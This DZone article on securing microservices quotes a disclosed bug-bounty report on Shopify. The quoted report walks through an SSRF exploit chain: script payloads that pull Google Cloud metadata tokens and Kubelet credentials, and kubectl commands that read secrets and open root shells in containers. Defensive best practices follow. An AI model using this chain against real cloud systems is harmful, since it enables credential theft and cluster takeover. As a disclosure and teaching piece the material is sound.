Over a million developers have joined DZone.
{{announcement.body}}
{{announcement.title}}

How to Secure Your Microservices — Shopify Case Study

DZone's Guide to

How to Secure Your Microservices — Shopify Case Study

Learn about the importance of securing your microservices and to prevent breaches like the one at Shopify.

· Microservices Zone ·
Free Resource

Containerized Microservices require new monitoring. Read the eBook that explores why a new APM approach is needed to even see containerized applications.

For large infrastructures, security for microservices is of paramount importance given the vast attack surface presented by them. It's important to understand the core concepts of how to keep them secure in a production environment in order to prevent breaches, and in this article, we will do exactly that. Also, I will outline a few practical methods to approach security issues with microservices in general as to what techniques and practices one might adopt to achieve the goal of securing microservices effortlessly.

We will also study Shopify's case, in which their microservices' instances were compromised via a single entry-point attack vector — publicly accessible cloud server instance metadata. This is was disclosed by the reporter and Shopify mutually. From their mistakes, we will try to learn the best practices to implement in our microservices deployment and development.

Overview

Let's see a brief overview of the microservices architecture and challenges that need to be overcome. These cumulatively present a wide array of security issues into the development cycle that may persist in the deployed production application as well.

Salient Points About Microservices in General

  • Decoupled components
  • Increased complexity
  • Immutable architecture
  • Shorter development timeframes and lifetime
  • Minimize dependencies and shared concerns
  • Small and focused
  • Data contracts (or not) between related services
  • Less commitment to a specific technology or stack
  • Good integration tests to avoid fragility as well as security uses

Security issues may also be developer-induced and brought about by lack of awareness about AppSec or simply ignorance about general application security norms. There is increased complexity due to certain factors like

  • Segmentation and isolation
  • Multi-cloud deployments, thus greater number of assets' security to manage
  • Identity management and access control
  • Data/message integrity
  • Rapid rate of change, deprecation cycle

The increased complexity of microservices architecture leads to an overall larger potential attack surface, and thus a greater risk due to an increased number of services and assets. Mitigation requires a scheduled periodic review of existing implementations as well as security audits done on a regular basis. Hence, a greater number of challenges in terms of the above points need to be addressed and overcome in course of development and deployment.

AppSec for Microservices

Appsec (Application Security) is of prime importance because even a single breach can cost millions for large organizations. However, most companies are ignorant of the methods in which they can secure their application, relying solely on automated vulnerability scanners and passive threat modeling to detect and ascertain security misconfigurations and test security of their microservices based application, while this isn't sufficient alone to tackle adverse situations. One needs to understand that passive and automated testing methodology alone don't suffice in a real-world context, as one also needs to follow best practices in Application Security to ensure that nothing goes wrong.

Especially, in the information security industry, dozens of exploits are being discovered and developed in widely-used frameworks every other day, should it be a cause for concern for us? The answer is yes and no, and it depends on a number of factors, mainly, how you deployed your microservices and configured them, also whether you followed any standard set of best practices during the course of development. A typical case-study about these exploits and security vulnerabilities reveals that most of these security vulnerabilities are mostly centered around a few configuration-based security problems, where developers are barely aware of the security best practices and blindly commit blatant basic mistakes in configuring their microservices which reflect in the production application.

Hence, a slight mistake on your part may create some huge impacts given the overall attack surface and the number of exploits being developed. This is why we should amend our ways and keep abreast with the best practices in the security of microservices, which forms a significant part of the discipline that one must adopt and practice for the AppSec of an organization.

Below are a few techniques and best practices that one must strictly incorporate and follow in microservices development and deployment to ensure that after deployment it remains safe and secure, conforming to industry security best practices standards, while in production.

Continuous Security

Security comes at a large cost if ignored. The goal of continuous security is to reduce the overall expense and overhead, as well as securing the microservices or application by periodically testing the security of our microservices. As opposed to only performing passive threat modeling and other redundant practices, one must adopt continuous security and follow the best practices, as are defined from time to time, in application security. Implementing the best methods of security requires continuous security through DevSecOps,  continuous security testing, and audits both done internally and externally, from different contexts of attackers, and analyzing how our microservices may be compromised or are vulnerable, to prevent and solve those problems beforehand.

Security audits on a regular basis are a must to cover the finer aspects so as to ensure that your microservices are following the best practices, and their security is kept to the best and safest level possible.

Methods

  1. Internal testing (mainly post-exploitation)
  2. External testing

Below, we shall discuss more on the best methods of practicing the goals of continuous security that we outlined above.

Case Study (Shopify)

Let's examine a real-world scenario that affected Shopify's microservice based architecture before further proceeding to learning the best practices

"Shopify infrastructure is isolated into subsets of infrastructure. @0xacb reported it was possible to gain root access to any container in one particular subset by exploiting a server side request forgery bug in the screenshotting functionality of Shopify Exchange. Within an hour of receiving the report, we disabled the vulnerable service, began auditing applications in all subsets and remediating across all our infrastructure. The vulnerable subset did not include Shopify core. After auditing all services, we fixed the bug by deploying a metadata concealment proxy to disable access to metadata information. We also disabled access to internal IPs on all infrastructure subsets. We awarded this $25,000 as a Shopify Core RCE since some applications in this subset do have access to some Shopify core data and systems."

The above was Shopify's statement on the Hackerone report to its bounty program.

After going through this report, we can come to this conclusion that even application-side vulnerabilities can lead to a server compromise. Going by the complexity of this attack, it wasn't much difficult to exploit. But a fairly simple SSRF vulnerability was leveraged by the attacker/reporter to leak the metadata of the master instance, thereby gaining root access to all other instances running on the Google Cloud Platform that directly come under the affected vulnerable instance.

The Shopify Exploit Chain

The Exploit Chain — Getting Root Access on All Shopify Instances

1 - Accessing Google Cloud Metadata

  • Create a store (partners.shopify.com)
  • Edit the template password.liquid and add the following content:
<script>
window.location="http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token";
// iframes don't work here because Google Cloud sets the `X-Frame-Options: SAMEORIGIN` header.
</script>


  • Go to https://exchange.shopify.com/create-a-listing and install the Exchange app
  • Wait for the store screenshot to appear on the Create Listing page
  • Download the PNG and open it using image editing software or convert it to JPEG (Chrome displays a black PNG)

{F289082}

Exploring SSRFs in Google Cloud instances require a special header. However, I found a really easy way to "bypass" it while reading the documentation: the /v1beta1 endpoint is still available, does not require the Metadata-Flavor: Google header and still returns the same token.

I tried to leak more data, but the web screenshot software wasn't producing any images for application/text responses. However, I found that I could add the parameter alt=json to force application/json responses. I managed to leak more data, such as an incomplete list of SSH public keys (including email addresses), the project name (█████), the instance name and more:

<script>
window.location="http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json";
</script>

{F289081}

Can I add my SSH key using the leaked token? No.

curl -X POST "https://www.googleapis.com/compute/v1/projects/███/setCommonInstanceMetadata" -H "Authorization: Bearer ██████████████" -H "Content-Type: application/json" --data '{"items": [{"key": "0xACB", "value": "test"}]}'


{
 "error": {
  "errors": [
   {
    "domain": "global",
    "reason": "forbidden",
    "message": "Required 'compute.projects.setCommonInstanceMetadata' permission for 'projects/███████'"
   },
   {
    "domain": "global",
    "reason": "forbidden",
    "message": "Required 'iam.serviceAccounts.actAs' permission for 'projects/███████'"
   }
  ],
  "code": 403,
  "message": "Required 'compute.projects.setCommonInstanceMetadata' permission for 'projects/████████'"
 }
}

I checked the scopes for this token and there was no read/write access to the Compute Engine API:

curl "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=██████████████████"


{
 "issued_to": "███████",
 "audience": "███",
 "scope": "https://www.googleapis.com/auth/cloud-platform",
 "expires_in": 1307,
 "access_type": "offline"
}


2 - Dumping kube-env

I created a new store and pulled attributes from this instance recursively: http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json

Result:
{F289455}

Metadata concealment is not enabled, so the kube-env attribute is available.

Since the image is cropped, I made a new request to http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json in order to see the rest of the Kubelet certificate and the Kubelet private key.

Result:
{F289456}

ca.crt

-----BEGIN CERTIFICATE-----
██████
███████
███████
████████
██████████████
████████
████████
███████
████
██████
███
█████████
████
████
████████
███████
███
-----END CERTIFICATE-----

client.crt

-----BEGIN CERTIFICATE-----
█████
███████
██████
████████
██████████
█████
██████
█████
█████
██████████
███████
█████
████
████
████████
████████
-----END CERTIFICATE-----

client.pem

-----BEGIN RSA PRIVATE KEY-----
█████████
██████
████████
████
████
█████████
██████████
██████
████████
█████████
██████
██████████
███
██████████
███
██████
█████████
████████
██████████
█████████
████
████
████████
████
███████
-----END RSA PRIVATE KEY-----

MASTER_NAME: █████

3 - Using Kubelet to Execute Arbitrary Commands

It's possible to list all pods {F289460}:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://██████ get pods --all-namespaces

NAMESPACE                                   NAME                                                              READY     STATUS             RESTARTS   AGE
████████                    ██████████                    1/1    

And create new pods as well:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://████████ create -f https://k8s.io/docs/tasks/debug-application-cluster/shell-demo.yaml

pod "shell-demo" created
$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://██████████ delete pod shell-demo

pod "shell-demo" deleted

I didn't try to delete running pods, obviously, I'm not sure if I would be able to delete them with user ████████. However, it's not possible to execute commands in this new pod or any other pod:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://█████████ exec -it shell-demo -- /bin/bash

Error from server (Forbidden): pods "shell-demo" is forbidden: User "███" cannot create pods/exec in the namespace "default": Unknown user "███"

The get secrets command doesn't work, but it's possible to describe a given pod and the get the secret using its name. That's how I leaked the kubernetes.io service account token using the instance ████ from the namespace ████:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://███ describe pods/█████ -n █████████

Name:           ████████
Namespace:      ██████
Node:           ██████████
Start Time:     Fri, 23 Mar 2018 13:53:13 +0000
Labels:         █████
                ████
                █████
Annotations:    <none>
Status:         Running
IP:             █████████
Controlled By:  █████
Containers:
  default-http-backend:
    Container ID:   docker://███
    Image:          ██████
    Image ID:       docker-pullable://█████
    Port:           ████/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Sun, 22 Apr 2018 03:23:09 +0000
    Last State:     Terminated
      Reason:       Error
      Exit Code:    2
      Started:      Fri, 20 Apr 2018 23:39:21 +0000
      Finished:     Sun, 22 Apr 2018 03:23:07 +0000
    Ready:          True
    Restart Count:  180
    Limits:
      cpu:     10m
      memory:  20Mi
    Requests:
      cpu:        10m
      memory:     20Mi
    Liveness:     http-get http://:███/healthz delay=30s timeout=5s period=10s #success=1 #failure=3
    Environment:  <none>
    Mounts:
      ██████
Conditions:
  Type           Status
  Initialized    True
  Ready          True
  PodScheduled   True
Volumes:
 ██████████:
    Type:        Secret (a volume populated by a Secret)
    SecretName: ███████
    Optional:    false
QoS Class:       Guaranteed
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute for 300s
                 node.kubernetes.io/unreachable:NoExecute for 300s
Events:          <none>


$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://██████ get secret███████ -n ███████ -o yaml

apiVersion: v1
data:
  ca.crt: ██████████
  namespace: ████
  token: ██████████==
kind: Secret
metadata:
  annotations:
    kubernetes.io/service-account.name: default
    kubernetes.io/service-account.uid: ████
  creationTimestamp: 2017-01-23T16:08:19Z
  name:█████
  namespace: ██████████
  resourceVersion: "115481155"
  selfLink: /api/v1/namespaces/████████/secrets/████
  uid: █████████
type: kubernetes.io/service-account-token

And finally, it's possible to use this token to get a shell in any container:

$ kubectl --certificate-authority ca.crt --server https://████ --token "█████.██████.███" exec -it w█████████ -- /bin/bash

Defaulting container name to web.
Use 'kubectl describe pod/w█████████' to see all of the containers in this pod.
███████:/# id
uid=0(root) gid=0(root) groups=0(root)
█████:/# ls
app  boot   dev  exec  key  lib64  mnt  proc  run   srv  start  tmp  var
bin  build  etc  home  lib  media  opt  root  sbin  ssl  sys    usr
███████:/# exit


$ kubectl --certificate-authority ca.crt --server https://███████ --token "█████.██████.█████████" exec -it ████████ -n ████████ -- /bin/bash

Defaulting container name to web.
Use 'kubectl describe pod/█████ -n █████' to see all of the containers in this pod.
root@████:/# id
uid=0(root) gid=0(root) groups=0(root)
root@████:/# ls
app  boot   dev  exec  key  lib64  mnt  proc  run   srv  start  tmp  var
bin  build  etc  home  lib  media  opt  root  sbin  ssl  sys    usr
root@█████:/# exit

Huge thanks to Luís Maia0xfad0, for helping me build this █████

Impact

CRITICAL

The hacker selected the Server-Side Request Forgery (SSRF) weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

Can internal services be reached bypassing network access control?

Yes.

What internal services were accessible?

Google Cloud Metadata.

Security Impact:

RCE.

Best Practices to Keep Your Microservices Safe

As learned from Shopify's case:

  • User Identity management, authorization and Access controls. Setting proper access controls and user authorization should be our first priority. One may use OAuth2 for controlling user authorization. Access controls can be set to control the scope of access and permissions for different types of user groups as per your needs. Third party services can also be made use of in this context. JWT or JSON Web Token based authentication may be used, JJWT is a good framework in this regard. An SSO can be implemented to handle authorization besides. For authentication, SAML and LDAP can also be used depending on the use case and their feasibility.
  • Enabling 2FA (two-factor authentication) with TOTP (time-based one-time password). This is a good practice additionally. It can prevent cases in which there have been vulnerabilities in the JWT or, the libraries being used for handling and dealing with authorization by acting as a second line of defense against exploits which might bypass the first step of authentication. One can implement the GoogleAuth library for this purpose.
  • Don't be naive and never store sensitive data in plain-text. For encrypting and decrypting data for different purposes, libsodium serves a good option for this purpose. Further, never use newer experimental encryption algorithms that often come bundled with frameworks, sometimes customized, and they have various kinds of vulnerabilities which may stay unknown or, have lesser-known exploits in them.
  • Use of API gateway and isolation of resources. Various 3rd party API gateways can be used to accomplish this purpose
  • Isolation of APIs and internal components to reduce the exposed attack surface.
  • For REST-API based security, always stay tuned to Owasp Top 10 vulnerabilities published at the end of each year after a thorough review. APIs might be suffering from SSRF, which we discussed in Shopify's case, that can even lead to potential RCE if not handled properly. These are nothing but some common vulnerabilities also found in web apps.
  • While using a cloud platform, for deployments, configure the account and instance access controls before deployment. Often, the metadata for server instances are left public. Similarly, AWS object buckets which belong to a particular microservice may also have been left public, take care to use ACLs to prevent them from being publicly listed, in the worst case. In Shopify's case, the attacker was able to gain root access by finding sensitive metadata related to server instances which were further leveraged to gain a full-fledged exploit.
  • Common serialization and deserialization, SQLi based vulnerabilities to protect against. Important to note here is unsafe deserialization can lead to many critical vulnerabilities including RCE. If a proprietary fix isn't available, a hotfix which is basically escaping and properly sanitizing user input can be implemented, for example, Kryo had a deserialization vulnerability which wasn't fixed.
    • Spark SQL
    • Kafka + Spark Serialization

Ways to handle authentication of APIs (frameworks and services):

  • Authentication
    • Cognito + AWS API Gateway to handle the heavy lifting
      • Cognito handles authenticating with credentials, MFA, etc.
      • API Gateway checks your access token or JWT (meh) and grants access
    • Perform role-based restrictions across services
    • Each request is signed, which provides an additional layer of authentication
    • Integrate Lambda functions for pre/post processing hooks
  • Never store sensitive keys and other information in Environment variables. These can in certain cases get exposed via application logs, or, can also be accessed unintentionally by other services, which makes it unsafe.

Discover how to automatically manage containers and microservices with better control and performance using Instana APM. Try it for yourself today.

Topics:
security ,microservices ,appsec ,tutorial ,software architecture

Opinions expressed by DZone contributors are their own.

{{ parent.title || parent.header.title}}

{{ parent.tldr }}

{{ parent.urlSource.name }}